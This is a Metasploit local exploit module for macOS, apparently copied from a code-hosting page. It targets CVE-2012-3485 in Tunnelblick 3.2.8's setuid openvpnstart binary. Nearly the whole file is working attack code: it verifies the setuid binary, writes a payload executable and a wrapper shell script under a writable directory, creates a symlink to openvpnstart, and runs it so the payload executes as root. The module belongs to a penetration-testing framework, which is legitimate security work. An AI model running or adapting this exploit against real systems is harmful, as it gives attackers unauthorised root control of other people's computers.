Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/osx/local/setuid_tunnelblick.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456class MetasploitModule < Msf::Exploit::Local7Rank = ExcellentRanking89include Msf::Post::OSX::Priv10include Msf::Post::File11include Msf::Exploit::EXE1213def initialize(info = {})14super( update_info( info, {15'Name' => 'Setuid Tunnelblick Privilege Escalation',16'Description' => %q{17This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The18vulnerability exists in the setuid openvpnstart, where an insufficient19validation of path names allows execution of arbitrary shell scripts as root.20This module has been tested successfully on Tunnelblick 3.2.8 build 2891.309921over Mac OS X 10.7.5.22},23'References' =>24[25[ 'CVE', '2012-3485' ],26[ 'OSVDB', '84706' ],27[ 'EDB', '20443' ],28[ 'URL', 'http://blog.zx2c4.com/791' ]29],30'License' => MSF_LICENSE,31'Author' =>32[33'Jason A. Donenfeld', # Vulnerability discovery and original Exploit34'juan vazquez' # Metasploit module35],36'DisclosureDate' => '2012-08-11',37'Platform' => 'osx',38'Arch' => [ ARCH_X86, ARCH_X64 ],39'SessionTypes' => [ 'shell' ],40'Targets' =>41[42[ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],43[ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]44],45'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },46'DefaultTarget' => 047}))48register_options [49# These are not OptPath because it's a *remote* path50OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),51OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ])52]53end5455def base_dir56datastore['WritableDir'].to_s57end5859def check60unless file? datastore['Tunnelblick']61vprint_error 'openvpnstart not found'62return CheckCode::Safe63end6465check = cmd_exec("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000")6667unless check.include? 'openvpnstart'68return CheckCode::Safe69end7071CheckCode::Vulnerable72end7374def clean75file_rm(@link)76cmd_exec("rm -rf #{base_dir}/openvpn")77end7879def exploit80if is_root?81fail_with Failure::BadConfig, 'Session already has root privileges'82end8384if check != CheckCode::Vulnerable85fail_with Failure::NotVulnerable, 'Target is not vulnerable'86end8788unless writable? base_dir89fail_with Failure::BadConfig, "#{base_dir} is not writable"90end9192print_status("Creating directory...")93cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"9495exe_name = rand_text_alpha(8)96@exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"97print_status("Dropping executable #{@exe_file}")98write_file(@exe_file, generate_payload_exe)99cmd_exec "chmod +x #{@exe_file}"100101102evil_sh =<<-EOF103#!/bin/sh104#{@exe_file}105EOF106107@sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"108print_status("Dropping shell script #{@sh_file}...")109write_file(@sh_file, evil_sh)110cmd_exec "chmod +x #{@sh_file}"111112link_name = rand_text_alpha(8)113@link = "#{base_dir}/#{link_name}"114print_status("Creating symlink #{@link}...")115cmd_exec "ln -s -f -v #{datastore["Tunnelblick"]} #{@link}"116117print_status("Running...")118begin119cmd_exec "#{@link} OpenVPNInfo 0"120rescue121print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")122clean123return124end125print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")126end127end128129130131